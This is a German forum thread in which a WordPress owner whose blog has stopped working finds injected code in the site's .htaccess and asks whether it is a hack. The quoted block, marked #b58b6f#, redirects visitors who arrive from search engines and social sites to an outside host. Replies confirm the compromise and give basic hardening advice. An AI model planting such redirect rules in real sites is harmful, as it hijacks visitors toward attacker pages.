Wordpress funktioniert nicht - Hackangriff?

  • Hallo liebe Community,

    seit kurzem funktioniert meine Wordpress-Blog nicht mehr. Vom einen auf den anderen Tag, ich habe nicht geupdatet oder sonst was gemacht.

    In der .htaccess Datei des Wordpress-Verzeichnisses steht:

    Apache Configuration
    #b58b6f#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$ http://rec-creations.com/adv.php [R=301,L]
    </IfModule>
    #/b58b6f#

    Was ist das? Besonders das "#/b58b6f#"? Eine reguläre Wordpress-Installation sieht anders aus! Ist das ein Hackangriff? Und wie kann ich solche zukünfitg verhindern?

    Da der Blog möglichst schnell wieder funktionieren soll, habe ich die .htaccess Datei einer anderen Wordpress-Installation blind in die des anderen Blogs kopiert:

    Apache Configuration
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress


    Das funktioniert leider nicht, obwohl beide Wordpress-Installationen auf 3.2.2 sind. Allerdings ist der Blog, der kaputt ist, in einem Ordner, während der Blog, von dem ich die neue .htaccess Datei genommen habe, im root-Verzeichnis ist.

    Also nochmal kurz zusammengefasst: HILFEEEEEE!!!! :D
    Ich weiß nicht was ich machen soll! Der Blog sollte möglichst schnell wieder funktionieren!

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Dieses b58b6f kommt mir bekannt vor... Deine Seite ist dann wohl gehacked worden. Hatte vor einiger Zeit mal was dazu geschrieben. Vielleicht hilft es Dir weiter. Wenn gleich ich glaube, dass es sich bei Dir um einen anderen Angreifer handelt. Die Vorgehensweise dürfte aber ansich nicht viel anders sein.

    Falls Du den Hack selbst nicht los wirst und sich hier keiner der Sache annehmen will, dann könntest Du auch ein entsprechendes Hilfegesuch im Jobforum absetzen. Für nen schmalen Euro findet sich bestimmt jemand, der Dir da hilft.

    Zitat

    Und wie kann ich solche zukünfitg verhindern?


    Tja, weniger Plugins einsetzen, Themes und WP immer auf dem aktuellsten Stand halten, den eigenen Rechner permanent auf Schädlinge prüfen, andere auf dem Server lagernde Scripte (z.B. andere CMS) aktuell halten, usw.

  • Ja, ich hatte Wordpress nicht auf dem neuesten Stand. Ich checke gerade meinen Computer nach Trojanern, aber wie es aussieht sind andere Wordpress-Installationen, die auf dem neuesten Stand waren, nicht betroffen.

    Aber um das Problem zu beheben: Wie sieht eine .htaccess Datei von einer Wordpress-Installation aus, die in einem Unterverzeichnis /blog liegt?

  • Ich habe es rausbekommen, wen es noch interessiert:

  • WordPress hat in einer Standardinstallation keine .htaccess.

    Wie die htaccess bei Dir aussehen muss, hängt von der Permalinkstruktur ab.

  • Ach ja, das stimmt, ich habe den Artikelnamen als Permalink. Das Problem hat sich aber auch jetzt gelöst.

    Vielen, vielen Dank für die schnelle Hilfe! Das es tatsächlich so schnell gehen kann, dass Wordpress infiziert ist, wusste ich gar nicht.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!